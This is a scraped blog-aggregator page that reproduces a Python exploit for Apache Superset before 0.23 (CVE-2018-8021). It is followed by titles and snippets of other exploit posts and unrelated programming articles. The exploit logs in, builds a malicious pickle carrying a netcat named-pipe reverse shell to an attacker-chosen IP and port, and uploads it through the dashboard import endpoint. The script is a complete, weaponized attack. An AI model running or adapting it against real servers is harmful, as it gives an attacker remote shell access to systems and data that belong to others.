# Exploit Title: Apache Superset < 0.23 - Remote Code Execution

# Date: 2018-05-17

# Exploit Author: David May (david.may@semanticbits.com)

# Vendor Homepage: https://superset.apache.org/

# Software Link: https://github.com/apache/incubator-superset

# Version: Any before 0.23

# Tested on: Ubuntu 18.04

# CVE-ID: CVE-2018-8021

# I originally disclosed this to the Apache Superset team back in May, and the fix had already been

# in place, but not backported. As far as I know, this is the first weaponized exploit for this CVE.

#!/usr/bin/env python

import sys

import os

from lxml import html

import requests

# Change these values to your TCP listener

myIP = '192.168.137.129'

myPort = ''

# Credentials must belong to user with 'can Import Dashboards on Superset' privilege

username = 'test'

password = 'test'

# Logic in case script arguments are not given

if len(sys.argv) < 3:

    print('Verify you have started a TCP listener on the specified IP and Port to receive the reverse shell...')

    print('Script Usage:')

    print('./supersetrce.py <superset server ip> <superset port>')

    sys.exit()

else:

    # Script arguments

    supersetIP = sys.argv[1]

    supersetPort = sys.argv[2]

    # Verify these URLs match your environment

    login_URL = 'http://' + supersetIP + ':' + supersetPort + '/login/'

    upload_URL = 'http://' + supersetIP + ':' + supersetPort + '/superset/import_dashboards'

    # Checks to see if file that we are going to write already exists in case this is run more than once

    if os.path.isfile('evil.pickle'):

        os.remove('evil.pickle')

    # Headers that we append to our POST requests

    headers_dict = {

        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',

        'DNT': '',

        'Connection': 'close',

        'Upgrade-Insecure-Requests': '',

    }

    # Creates evil pickle file and writes the reverse shell to it

    evilPickle = open('evil.pickle','w+')

    evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc ' + myIP + ' ' + myPort + ' 1>/tmp/backpipe\'\ntR.')

    evilPickle.close()

    # Start a session so we have persistent cookies

    session = requests.session()    

    # Grabs the Login page to parse it for its CSRF token

    login_page = session.get(login_URL)

    if login_page.status_code != 200:

        print('Login page not reached, verify URLs in script')

    login_tree = html.fromstring(login_page.content)

    csrf_token = login_tree.xpath('//input[@id="csrf_token"]/@value')

    # Form data that is sent in the POST request to Login page

    login_data = {

        'csrf_token' : csrf_token,

        'username' : username,

        'password' : password,

    }

    # Adds the Referer header for the login page

    headers_dict['Referer'] = login_URL

    # Logon action

    login = session.post(login_URL, headers=headers_dict, data=login_data)    

    # Grabs the Upload page to parse it for its CSRF token

    upload_page = session.get(upload_URL)

    if upload_page.status_code != 200:

        print('Upload page not reached, verify credentials and URLs in script')

    upload_tree = html.fromstring(upload_page.content)

    csrf_token = upload_tree.xpath('//input[@id="csrf_token"]/@value')

    # Adds the Referer header for the Upload page

    headers_dict['Referer'] = upload_URL

    # Upload action

    upload = session.post(upload_URL, headers=headers_dict, data={'csrf_token':csrf_token}, files={'file':('evil.pickle',open('evil.pickle','rb'),'application/octet-stream')})

    # Closes the session

    session.close()

    sys.exit()

[EXP]Apache Superset < 0.23 - Remote Code Execution的更多相关文章

  1. Apache / PHP 5.x Remote Code Execution Exploit

    测试方法: 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! /* Apache Magica by Kingcope */ /* gcc apache-magika.c -o ...

  2. [EXP]phpBB 3.2.3 - Remote Code Execution

    // All greets goes to RIPS Tech // Run this JS on Attachment Settings ACP page var plupload_salt = ' ...

  3. [EXP]ThinkPHP 5.0.23/5.1.31 - Remote Code Execution

    # Exploit Title: ThinkPHP .x < v5.0.23,v5.1.31 Remote Code Execution # Date: -- # Exploit Author: ...

  4. [我的CVE][CVE-2017-15708]Apache Synapse Remote Code Execution Vulnerability

    漏洞编号:CNVD-2017-36700 漏洞编号:CVE-2017-15708 漏洞分析:https://www.javasec.cn/index.php/archives/117/ [Apache ...

  5. [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution

    # Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...

  6. CVE-2014-6321 && MS14-066 Microsoft Schannel Remote Code Execution Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 这次的CVE和 ...

  7. Tomcat put上传漏洞_CVE2017-12615( JSP Upload Bypass/Remote Code Execution)

    CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution) 一.漏洞原理 在windows服务器下,将readonly参数设 ...

  8. MyBB \inc\class_core.php <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution(Reverse Shell Exploit) Vulnerability

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 MyBB's unset_globals() function ca ...

  9. Roundcube 1.2.2 - Remote Code Execution

    本文简要记述一下Roundcube 1.2.2远程代码执行漏洞的复现过程. 漏洞利用条件 Roundcube必须配置成使用PHP的mail()函数(如果没有指定SMTP,则是默认开启) PHP的mai ...

随机推荐

  1. Pandas排列和随机采样

    随机重排序 import pandas as pd import numpy as np from pandas import Series df = pd.DataFrame(np.arange(5 ...

  2. php生成红包

    <?php /** * 随机生成红包金额 * @param $n 红包个数 * @param $sum 总金额 整数 * @param $index_max 最大金额在数组中索引 * @para ...

  3. 20175314 实验一 Java开发环境的熟悉

    20175314 实验一 Java开发环境的熟悉 一.实验内容 1.使用JDK编译.运行简单的Java程序: 2.使用IDEA 编辑.编译.运行.调试Java程序. 3.完成实验,撰写实验报告,注意实 ...

  4. Handler实现消息的定时发送

    话不多说,直接上代码 private Handler mHandler = new Handler() { @Override public void handleMessage(Message ms ...

  5. [leetcode]7. Reverse Integer反转整数

    Given a 32-bit signed integer, reverse digits of an integer. Example 1: Input: 123 Output: 321 Examp ...

  6. eclipse中将一个项目作为library导入另一个项目中

    1. github上搜索viewpagerIndicator: https://github.com/JakeWharton/ViewPagerIndicator2. 下载zip包,解压,eclips ...

  7. 网络虚拟化技术(二): TUN/TAP MACVLAN MACVTAP (转)

    网络虚拟化技术(二): TUN/TAP MACVLAN MACVTAP 27 March 2013 TUN 设备 TUN 设备是一种虚拟网络设备,通过此设备,程序可以方便得模拟网络行为.先来看看物理设 ...

  8. mysql---select的五种子句学习(where、group by、having、order by、limit)

      mysql---select的五种子句学习(where.group by.having.order by.limit) 分类: Mysql学习2012-09-27 16:14 1533人阅读 评论 ...

  9. ActiveMQ_4SpringBoot整合

    SpringBoot实现 引入jar包 <dependency>        <groupId>org.springframework.boot</groupId> ...

  10. ABP框架系列之五十三:(Web-API-Controllers-Web-API-控制器)

    Introduction ASP.NET Boilerplate is integrated to ASP.NET Web API Controllers via Abp.Web.Api nuget ...